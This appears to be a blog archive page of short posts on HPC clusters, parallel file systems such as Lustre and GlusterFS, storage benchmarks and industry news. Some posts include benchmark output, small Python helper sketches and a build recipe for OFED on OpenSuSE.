A long while ago, I had developed a usage summary tool for gridengine. For our small internal cluster, we are using Torque (we set it up just as the dejecta was hitting the high rotational rate elements w.r.t. gridengine at Oracle; the link URL may not be safe for work, and you might be offended by it … if so, I apologize). This summary tool was a quick way to parse the accounting records.
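The original tool isn’t reproduced here. As a rough illustration of what summarizing the records involves, a minimal Python sketch. It assumes the usual PBS/Torque accounting line layout (date and time, record type, job id, then space-separated key=value pairs), counts only E (job end) records, and reads the user and resources_used.walltime keys; the sample records and function names are hypothetical.

```python
from collections import defaultdict


def walltime_seconds(hms: str) -> int:
    """Convert an HH:MM:SS walltime (hours may exceed 24) to seconds."""
    hours, minutes, seconds = (int(part) for part in hms.split(":"))
    return hours * 3600 + minutes * 60 + seconds


def summarize(lines):
    """Per-user job count and total walltime, from 'E' (job end) records only."""
    usage = defaultdict(lambda: {"jobs": 0, "walltime_s": 0})
    for line in lines:
        # Assumed layout: "MM/DD/YYYY HH:MM:SS;TYPE;JOBID;key=value key=value ..."
        parts = line.rstrip("\n").split(";", 3)
        if len(parts) != 4 or parts[1] != "E":
            continue
        fields = dict(kv.split("=", 1) for kv in parts[3].split() if "=" in kv)
        record = usage[fields.get("user", "unknown")]
        record["jobs"] += 1
        record["walltime_s"] += walltime_seconds(fields.get("resources_used.walltime", "0:0:0"))
    return dict(usage)


# Hypothetical sample records, not real accounting data.
SAMPLE = [
    "04/01/2011 10:00:00;Q;101.head;queue=batch",
    "04/01/2011 11:00:00;E;101.head;user=alice queue=batch resources_used.walltime=01:00:00 Exit_status=0",
    "04/01/2011 12:30:00;E;102.head;user=alice queue=batch resources_used.walltime=00:30:00 Exit_status=0",
    "04/01/2011 12:45:00;E;103.head;user=bob queue=batch resources_used.walltime=00:15:00 Exit_status=1",
]

for user, stats in sorted(summarize(SAMPLE).items()):
    print(f"{user}: {stats['jobs']} jobs, {stats['walltime_s'] / 3600:.2f} walltime hours")
```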
Posts
Members of Rocks core team moving to Rocks startup
Rocks, as folks might know, is a cluster distribution based upon Redhat/Centos. This brings in all sorts of issues on its own, but Rocks attempts to work around this and knead the distribution and associated tools into a cogent form, for simple cluster setup. The core team consisted of the project lead, several developers and a number of others directly or loosely affiliated with the group. Two members, Dr. Greg Bruno, and Mason Katz, just left to join Clustercorp, who make the commercial version, Rocks+.
Posts
Plus ca change, plus c'est la meme chose
The more things change, the more they stay the same. My former employer (left on good terms, between layoffs a decade ago next month) SGI has layoffs coming. This is a tough environment folks, a very tough environment. We pulled out a nearly 12% revenue growth in it. SGI posted a profit, but if you click through to the underlying article (hit InsideHPC first though), you see some interesting analysis. First on the size of the layoff.
Posts
The spork gains support
This is goodness. Really. Peter Jones just sent out an email to the Lustre Discuss list, and it covers much of what I was hoping to see. Process ownership, agreement around the release for 2.1, central tracker, and build info. Yeah, it’s probably not the optimal outcome, but it’s a better place than where we were a week or more ago. And that was still better than a month or two ago.
Posts
Interesting FUD floating about
One of our competitors, having been recently purchased by a very large storage company, seems to be telling some customers that they replaced an infrastructure that we sold to a large supercomputer center in the northern midwest. Curious, I hadn’t heard of this. Last I checked (a few minutes ago), the infrastructure was still in use. Moreover, they said “they” replaced GlusterFS on the system. Again … curious, as I don’t quite remember them on the con-calls.
Posts
Cloudy expectations for HPC
I’ve mentioned in the past cases where users’ expectations deviated, often wildly, from the reality of a system. The reason for these deviations of expectations could be internal (convincing yourself that “instant” means, literally, “instant”), external (believing marketing blurbs), or some factor between the two. At HPCinthecloud, an article on a user running head first into the reality of cloud computing, and avoiding the hype. Ok, a number of critical take-aways. One is that end user expectations can be wildly … badly … out of sync with reality.
Posts
We need to get better at weather forecasting
Big HPC area. Yesterday, all the forecast models had us getting ~1.5 inches (about 4cm) of snow with rain/ice afterwards. We got (locally by me) 12+ inches (30+cm). Ok. I don’t mind if there are large error bars. Really I don’t. But this? I don’t know enough about the models to be able to say anything terribly intelligent about their intrinsic accuracy, or if they omit anything, under/over predict anything … I do know enough to say that they weren’t in the same ballpark as what we got.
Posts
Need to look at MooseFS
Looks similar to a number of others, but what’s interesting is that it keeps its metadata in RAM. How much of an impact that has on updates depends upon the efficiency of the network stack, and how much security it provides depends upon its ability to recover from unplanned outages … that is, it can’t just run in RAM and occasionally update something on disk. Gotta look at this more though, as it could be interesting as a front end FS to something else on the backend.
Posts
Old model JackRabbit 5U bonnie++
Previous version of our JR5 unit, in the lab as a test bed for customers. Testing firmware and driver updates, among other things. Simple bonnie++ 1.96 run. You know I am not a huge fan of this as a load generator, or as a benchmark. Regardless, here is the output:
[root@jr5-lab ~]# bonnie++ -u root -d /data -s 144g:1024k -f Using uid:0, gid:0. Writing intelligently...done Rewriting... done Reading intelligently...done start 'em.
Posts
RFPs that request a pony
Yeah, I have one of those in front of me now. The requirements are, for all intents and purposes, impossible to simultaneously satisfy. Q&A response from the customer suggests that they may be willing to compromise on some aspects, but not enough to actually satisfy their request. Sort of like “I want 1 PB … for free, with free lifetime 24x7 support, … , infinite bandwidth, infinite snapshots, infinite IOPs. And I want a pony.
Posts
Pushing atoms versus pushing bits
Cloud computing is driving a disruptive change through a number of market places. It started long before virtualization, but virtualization really enabled much of what we have now. Remember, at the end of the day, the entire process is economic in nature. Cost per cycle does matter. When a vendor sells hardware, they are selling all the cycles of that hardware over the usable lifetime of the hardware. They push the atoms at the customer, and let the customer manage the economics of utilization.
Posts
Storage bandwidth wall writ large
Henry Newman, CEO/CTO of Instrumental, has a great article on Enterprise Storage Forum. Remember, what we call the storage bandwidth wall, i.e. the time in seconds to read/write your disk, is your capacity divided by your bandwidth to read/write that capacity. It’s a height, measured in seconds, to take one pass through your data. If you can read/write at 1GB/s and have 1TB of data, your wall height is 1000GB/(1 GB/s) = 1000s.
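The wall height is just capacity over bandwidth. A minimal Python sketch; the 96TB at 3.5 GB/s case is a hypothetical chosen for illustration, not a measured result.

```python
def wall_height_seconds(capacity_gb: float, bandwidth_gb_s: float) -> float:
    """Height of the storage bandwidth wall: seconds for one full pass over the data."""
    if bandwidth_gb_s <= 0:
        raise ValueError("bandwidth must be positive")
    return capacity_gb / bandwidth_gb_s


# The post's example: 1TB (1000GB) read/written at 1 GB/s.
print(wall_height_seconds(1000, 1.0))  # 1000.0

# Hypothetical: 96TB of data behind a 3.5 GB/s pipe, expressed in hours (about 7.6).
print(wall_height_seconds(96_000, 3.5) / 3600)
```

Adding capacity without adding bandwidth makes the wall taller; the only way to lower it is more bandwidth per unit of capacity.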
Posts
More code golf: "grid" computing
I told you I was an addict. Problem statement is here.
And you want to do it in the minimum number of characters (e.g. golf strokes) in your programming language. They give an example matrix, and their result (which is correct). So … what can you do for this? I used two languages: Octave/Matlab and Perl. The former is more of a ‘modeling’ language with formal programming bits atop it, and the latter is a classical programming language, quite notorious for its ability to be terse.
Posts
JackRabbit updates for greater density
JR4 units with up to 72 TB per 4U, at our nice sustained 2+ GB/s data rates. JR5 units with up to 144 TB per 5U at 2.5+ GB/s data rates. You can order our systems with these units. That’s 720TB/rack of JR4’s with 20+ GB/s sustained, or 1152TB per rack of JR5’s with 20 GB/s sustained. Built into our siCluster units, they represent some of the fastest and most cost effective hardware to build storage, storage clusters, storage clouds, and so on.
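The per-rack figures follow from multiplying out the per-unit numbers. A Python sketch: the units-per-rack counts (10 JR4, 8 JR5) are inferred from the 720TB and 1152TB totals, and the aggregate bandwidth assumes perfect linear scaling across units, which is optimistic. The full-pass time is the bandwidth wall for the whole rack.

```python
from dataclasses import dataclass


@dataclass
class RackConfig:
    units: int            # storage units per rack
    tb_per_unit: float    # raw capacity per unit, TB
    gb_s_per_unit: float  # sustained streaming rate per unit, GB/s

    def capacity_tb(self) -> float:
        return self.units * self.tb_per_unit

    def bandwidth_gb_s(self) -> float:
        # Assumes perfect linear scaling across units (optimistic).
        return self.units * self.gb_s_per_unit

    def full_pass_hours(self) -> float:
        # Bandwidth wall for the whole rack: capacity / bandwidth, in hours.
        return self.capacity_tb() * 1000.0 / self.bandwidth_gb_s() / 3600.0


jr4_rack = RackConfig(units=10, tb_per_unit=72, gb_s_per_unit=2.0)
jr5_rack = RackConfig(units=8, tb_per_unit=144, gb_s_per_unit=2.5)

for name, rack in (("JR4", jr4_rack), ("JR5", jr5_rack)):
    print(name, rack.capacity_tb(), "TB,", rack.bandwidth_gb_s(), "GB/s,",
          round(rack.full_pass_hours(), 1), "hours per full pass")
```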
Posts
Sometimes you get the bear ... other times, the bear gets you
This took guts. The (new) CEO of Nokia noting that there are issues going forward. Nokia has had great handsets. I still recall with great fondness, the E61 that I left in a taxi somewhere in London after visiting a customer … But Nokia hasn’t innovated in a meaningful way, hasn’t adapted well to the rapid change in market conditions. Like RIM, their phones are competent, excellent phones. Unlike Apple and Google/Android, their phones don’t have a great user experience.
Posts
Physics humor for a Friday morning ...
From xkcd. Heh … If you don’t know what a complex conjugate is, read this. Basically, if I have a function Ψ(x) which has a “real” part ψr(x) and an imaginary part ψi(x), with the ψ’s being real-valued functions, so that Ψ(x) = ψr(x) + i*ψi(x), then multiplying Ψ(x) by its complex conjugate Ψ*(x) = ψr(x) - i*ψi(x) (where i = √(-1)) yields:
(ψr(x) + i*ψi(x)) * (ψr(x) - i*ψi(x))
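Carrying the multiplication through: the two cross terms cancel, and since i² = -1 the last term flips sign, leaving a real, non-negative result, the squared magnitude of Ψ(x).

```latex
\begin{aligned}
\Psi(x)\,\Psi^*(x) &= \bigl(\psi_r(x) + i\,\psi_i(x)\bigr)\bigl(\psi_r(x) - i\,\psi_i(x)\bigr) \\
&= \psi_r(x)^2 - i\,\psi_r(x)\,\psi_i(x) + i\,\psi_i(x)\,\psi_r(x) - i^2\,\psi_i(x)^2 \\
&= \psi_r(x)^2 + \psi_i(x)^2 = \lvert \Psi(x) \rvert^2
\end{aligned}
```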
Posts
fun with SCSI targets
Had some fun today with our SCSI target. It’s a very nice system, very powerful. Not terribly easy to use. But it works well. We have tools we developed around it to make it easy to use. Creating iSCSI targets works nicely with our target code. It builds the target, sets up the infrastructure. Done with thin provisioning, it’s pretty fast and mostly painless. Well, it was until we discovered that the stack, while including /etc/initiators.
Posts
... and Lustre sporks ...
A spork is a cross between a spoon and a fork. Of course there is a double entendre buried in there, as spoon (or spooning) implies a close relationship, and a fork (or forking) implies a split from an original. I think Lustre is sporking. Seriously. And this is a good thing for Lustre (as the major forces behind it are aligning, and still bending over backwards to avoid using the dreaded “f”-word).
Posts
Semi-OT: No ... really ... no ...
This is an economic thing. If I sell my house, in my suburban neighborhood, and I make a profit from that activity, should I be required to share my profit with my neighbors, who don’t own my house? The answer to this is, obviously not. If my business makes money, and makes a profit, should I be required to share my profit with others, who don’t own a portion of my business?
Posts
And yet again ...
Me: (presents A) “So what do you think?” Them: “Hmmm … nice but what comes after A?” Me: “Let’s get another time slot and I’ll go over that” (time passes … order of weeks) Me: (presents post-A) “So what do you think” Them: “Hmmm … nice but what comes after post-A?” Me: “Let’s get another time slot and I’ll go over that” (time passes … order of several months, let’s call B post-post-A, and we hit important business milestones) Me: (presents B) “So what do you think” Them: “Hmmm … nice but what about A?
Posts
OT: First good legislation of the year; Get rid of the onerous 1099 stuff from Obamacare
Looks like the amendment passed. This provision would have required that we keep records of every transaction above $600 in terms of 1099 forms. So if I go buy tickets for a business trip on LinkedIn, I have to fill out some 1099 bits (and so do they). If someone buys more than $600 of stuff from us, an exchange of 1099 info. Yeah. It was really dumb, and it shouldn’t have been in Obamacare.
Posts
If you can't beat em, copy em ...
Google catches Microsoft with its proverbial hand in the (search) cookie jar … Microsoft’s non-denial denial reads not unlike a Monty Python skit I am fond of. Search for “bat”. “No we didn’t!!!” then “Well, what we meant was ….” heh! That takes cojones!
Posts
2010: Day job's best year on record, ever
Just finished an analysis of last year’s results. We are a private company, so we don’t release financial info (apart from to potential investors and those looking to take a stake in the company). We hit 11.7% growth in revenue for the year, and hit a company all time high revenue. This is despite a rather challenging economic environment (to say the least). Costs rose, some … er … astoundingly so. Looking to build on this, and accelerate forward.
Posts
Are HPC cloud users expectations realistic?
Several years ago, before clouds were all the rage, we were working with a large customer discussing an “on-demand” HPC computing service. This service predated Amazon’s setup, and was more in line with what Sabalcore, CRL and others are doing. I remember distinctly from my conversations with the customer that they had particular desires. Specifically, they wanted to run on always the latest/greatest/fastest possible hardware, and not pay any more for this.
Posts
Throwing signs
Too funny:
[ ](http://scalability.org/images/geekgangsignsmain11-450x311.jpg)
[had to update, as the folks putting the image up started blocking our link back to them … I thought we did this correctly … wasn’t trying to steal bandwidth]
Posts
Oh what a day
No details, but this is the sort of day I can do without in terms of excitement. Tonight is fight night in karate. Maybe I can suit up and hit with my good hand. Yeah, it’s been one of those days.
Posts
As the high performance storage world evolves ...
Last year, say July time frame, if you asked me to name the top high performance computing file systems, and prognosticate who the up and comers were … well, you’d get lists much like I’ve said here in the past. Lustre was the “king” and undisputed leader. pNFS was (sorry Bruce and team) effectively perpetually in the future (yeah, sort of like Perl6 … though we intend to play with both sometime soon … I hope).
Posts
My kingdom for good error messages ... or something like that
I just spent too long tearing my (altogether far too few remaining) hair(s) out over a driver issue. Qlogic 7240 IB card. Decent DDR unit. Our 2.6.32.22 kernel. Very stable kernel. Rock solid under ridiculous load. OFED 1.5.2 with all the nice bug fixes etc. And inserting/removing qib would cause all manner of kernel hiccups. So much for stability. Well, that is, as long as the ib_ipath.ko, from the kernel RPM, was in there.
Posts
There are times that this is amusing ... other times, not so much
Customer: Must be something wrong with your gear, because we know what we are doing. Me: Er … (noting that something that was working correctly before they touched it, is no longer working) … ok … so what changes have you made? Customer: Changes? We haven’t changed anything! Me: Er … but it was working, then it stopped working. So what changed? Customer: We just altered the network Me: Ok, now we are onto something (and likely the reason why the “equipment is broken") Customer: But we didn’t break it … Me: Yes, I understand.
Posts
Interesting observation with respect to the poll
I’ve been monitoring the IP addresses and logs on the poll voting. You can vote for more than one item, select several, hit vote, and it generates a cookie so that you won’t be able to vote again. That is, unless you take the explicit step of clearing this cookie. And voting again. What this is telling me is that people feel a need not to simply report their (possibly multiple) preferences … but instead to actively game an informal measurement system.
Posts
Eric Schmidt out in April as CEO of google
See here. Larry Page (U of Mich alum … woot!*) More power to Larry (and all the other co-founders out there with vision and a desire to get the job done). Don’t forget to grow some data center bits here … its really cold right now … no need to spend on cooling for like 6 months out of the year! (not to mention, we have some nice servers we can customize for you!
Posts
Day job: new website about to go up
We’ve been busy. Real busy. Did I mention we’ve been busy? Once the website rolls, please, by all means, let us know if something’s broken. Email works. Hopefully we won’t melt the server … [Update] Doug rocks. In case I didn’t mention it. He rocks! Site’s up with minor breakage (modulo grammar, inconsistent numbers … ) May need a site breakage bounty. Gonna think about this ….
Posts
Call it what it is
Saw this on /.
Paraphrasing Shakespeare, a fork by any other name … Look … I appreciate that no one wants to call this a fork. Oracle has seemingly abandoned the project and is shopping ownership of the IP around. The choices ahead of the community are to find someone to buy the IP and rally to their leadership, or to ignore the IP, rename the project, and fork it. You could always pretend that the IP isn’t an issue, that no fork is needed, and then have to do some serious rhetorical contortions to explain why your release isn’t a fork.
Posts
Interesting poll on Lustre futures
See here on LinkedIn. In case you can’t see it, the premise of the question is “Would you buy storage based on Lustre?”, and it specifically points to Rich B’s article at InsideHPC. Choices are:
Yes, still Lustre
No, I’d choose Panasas
No, I’d choose GPFS
No, I’d choose Gluster
No, another solution
It’s a small, self-selecting, and probably badly biased sample, but what’s interesting is that about 20% each seem like they would choose Lustre, Panasas, or another solution, and about 40% would choose GPFS, with no one choosing Gluster.
Posts
Its nice to see people seeing what we've been predicting
I could pat my own back on this … no really, I could. Wouldn’t be hard. I’ve been talking for a long time about how the HPC market will likely evolve. Hidden within this is how to grow as a business … serving this need. We’ve been predicting that the cloud HPC model will reduce the number of new clusters deployed. Basically, acquisition costs for running a cluster are large, as well as the lifetime costs.
Posts
OT: Ouch !
Not that cnbc is the bastion of correct/reliable/accurate reporting, but this article definitely hurts. The “American dream” has been to own your own house. We bought ours 13 years ago, with a 30 year mortgage. Refinanced 6 years ago to a 20 year mortgage, with the same payments. We assumed the value of the house would be increasing or at worst, staying the same. Last I checked on a few real estate sites, we are “underwater or upside-down” on the mortgage.
Posts
Worth asking again ... does Lustre have a future?
This is going to sound like a strange question to ask. Yes … I know it is a strange question to ask given the events of the past few months. A long while ago, I postulated that Lustre’s future was (no pun intended) cloudy at best. That Sun/Oracle had an uncertain level of commitment to it, and Larry Ellison is a businessman, and doesn’t run a charity … there aren’t any freebies he is likely to fund forever.
Posts
I had read it right ...
A partner was working with us on an opportunity. At some point in the process, the customer tripped my alarms. This was going well into 2x4 material (e.g. our proposal wasn’t going to be seriously considered). I shared my thoughts with the partner. They wanted to press ahead. Sure enough, we got word of our 2x4-ness today. Nice to know we helped a customer beat a competitor up. Well, no, not really.
Posts
The bandwidth wall: aka a 19.2 TB write sprint; how fast can your storage do it?
[root@jr5-lab ~]# fio sw.fio Run status group 0 (all jobs): WRITE: io=19,200GB, aggrb=2,323MB/s, minb=2,379MB/s, maxb=2,379MB/s, mint=8463222msec, maxt=8463222msec That’s 8463.2 seconds to you and me. 2.351 hours. 8.17TB/hour. And we didn’t even fill the unit up. This is what we mean by a low bandwidth wall. You can conceivably read/write the entire storage in a time comparable to single hours. If your platform can’t handle this (and most can’t), then you have a very high wall erected between you and your data.
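The same arithmetic can be pulled straight out of fio’s group summary. A minimal Python sketch, assuming the older “Run status group” line layout shown in these posts (current fio releases print bw= and run= fields instead, so the pattern would need adjusting) and fio’s default base-1024 units. It takes maxt, the slowest job’s runtime, as the wall-clock time, so the result should land close to fio’s own aggrb.

```python
import re

# Matches the older fio "Run status group" summary layout seen in these posts.
RUN_STATUS = re.compile(
    r"(?P<op>READ|WRITE): io=(?P<io>[\d,.]+)(?P<unit>[KMGT]B),.*?maxt=(?P<maxt>\d+)msec"
)
# Assumes fio's default unit base of 1024, so GB here means 1024 MB.
TO_MB = {"KB": 1 / 1024, "MB": 1, "GB": 1024, "TB": 1024 * 1024}


def parse_run_status(line: str) -> dict:
    """Pull the operation, total IO (MB), and wall time (s, from maxt) from a summary line."""
    match = RUN_STATUS.search(line)
    if match is None:
        raise ValueError("no fio run-status summary found in line")
    io_mb = float(match.group("io").replace(",", "")) * TO_MB[match.group("unit")]
    seconds = int(match.group("maxt")) / 1000.0
    return {"op": match.group("op"), "io_mb": io_mb, "seconds": seconds,
            "mb_per_s": io_mb / seconds, "hours": seconds / 3600.0}


line = ("Run status group 0 (all jobs): WRITE: io=19,200GB, aggrb=2,323MB/s, "
        "minb=2,379MB/s, maxb=2,379MB/s, mint=8463222msec, maxt=8463222msec")
summary = parse_run_status(line)
print(f"{summary['op']}: {summary['mb_per_s']:.0f} MB/s over {summary['hours']:.3f} hours")
```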
Posts
Lab JR5 quickie benchmarks
I saw some clustered file system results a few months ago where the vendor was happy to sustain something like 1.4 GB/s during their IO operations, and called this good. Something like 60 disks. Lustre, and some other bits. Their approach (and most people’s approach) in this space is to start with a bunch of demonstrably slow servers/disks, and aggregate them. Which eventually gets you to the performance you are looking for, albeit with low performance density, large expenditure of capital, large investment in space/power/cooling.
Posts
Interesting (re)entre into the deskside/server side
I had expected NVidia to do something. AMD and Fusion. Intel with AVX (Larrabee, et al.) and integrated video. NVidia had to either develop its own processor, buy a design/company, or fight a future battle it would likely lose … not due to the quality of the competitors or their parts, but simply because the deck was stacked against it. Their direction is interesting: going ARM, with a Fusion-like CPU + GPU combination (though I doubt they will call it an APU … they are all about the APU … where A==G).
Posts
As good as my 2x4 detector is, it's still not perfect
We don't like being used as a 2x4 (two-by-four) … basically a heavy chunk of wood used to beat someone into submission. One of the surest signs of 2x4-dom is being asked for an onsite loaner. The theory is supposed to be that a customer will evaluate a unit in their environment, give it a rigorous going over, and then make a purchase decision based upon that.
Posts
Churchillian thoughts .... about grub
Ahh … grub. That boot loader. The one that … after interacting with … you wish you didn't have to. Just had some fun a few minutes ago on a Lustre upgrade. Some of the grub tools are slightly broken; many are horribly, irretrievably borked. And they will do bad things to you. To your disk. Paraphrasing Churchill, grub is the worst boot loader, except for all the rest. I'll argue that it's marginally better than lilo.
Posts
Projects for the new year ...
Some near-term … some far-term. Pragmatic projects:
Dust. Almost to the point where I am happy releasing it. It will have ~6 driver packs, a spec, a user tool, and a roadmap when I am done. Think of it as a DKMS that works, and what DKMS could have been.
Lustre. We have operational Lustre builds from the git tree, though these are 2.x builds, not 1.8.x builds.
Posts
Guide to getting OFED 1.2 to build on OpenSuSE
Grab the tarball from the OpenFabrics Alliance (or from here).
Grab build_new.sh from here and place it in the OFED-1.2 directory. Then, as root on your machine, move the kernel tree's miscdevice.h aside and symlink the system header in its place:

mv /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h.original
ln -s /usr/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h

Then run build_new.sh. Voilà. It works. Binary RPMs are here.
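The mv / ln -s step can also be scripted so it is repeatable and reversible. A minimal Python sketch, assuming the same header paths as the steps above; the function names are hypothetical, and the restore helper is an addition of mine rather than part of the original recipe. Touching the real paths under /usr/src requires root.

```python
from pathlib import Path


def _backup_path(kernel_header: Path) -> Path:
    """Where the kernel tree's original header is kept (miscdevice.h.original)."""
    return kernel_header.with_name(kernel_header.name + ".original")


def swap_in_system_header(kernel_header: Path, system_header: Path) -> Path:
    """Move the kernel tree's header aside and symlink the system copy in its place.

    Equivalent to the manual mv + ln -s step; returns the backup path.
    """
    backup = _backup_path(kernel_header)
    if kernel_header.is_symlink():
        # Already swapped on an earlier run; nothing to do.
        return backup
    if backup.exists():
        raise FileExistsError(f"refusing to overwrite existing backup {backup}")
    kernel_header.rename(backup)             # mv miscdevice.h miscdevice.h.original
    kernel_header.symlink_to(system_header)  # ln -s <system header> miscdevice.h
    return backup


def restore_header(kernel_header: Path) -> None:
    """Hypothetical undo step: put the kernel tree's original header back."""
    backup = _backup_path(kernel_header)
    if kernel_header.is_symlink() and backup.exists():
        kernel_header.unlink()
        backup.rename(kernel_header)


# Usage (as root), with the paths from the steps above:
#   kernel = Path("/usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h")
#   swap_in_system_header(kernel, Path("/usr/include/linux/miscdevice.h"))
#   ... run build_new.sh ...
#   restore_header(kernel)
```

Making the swap idempotent means rerunning a failed build does not clobber the saved original header.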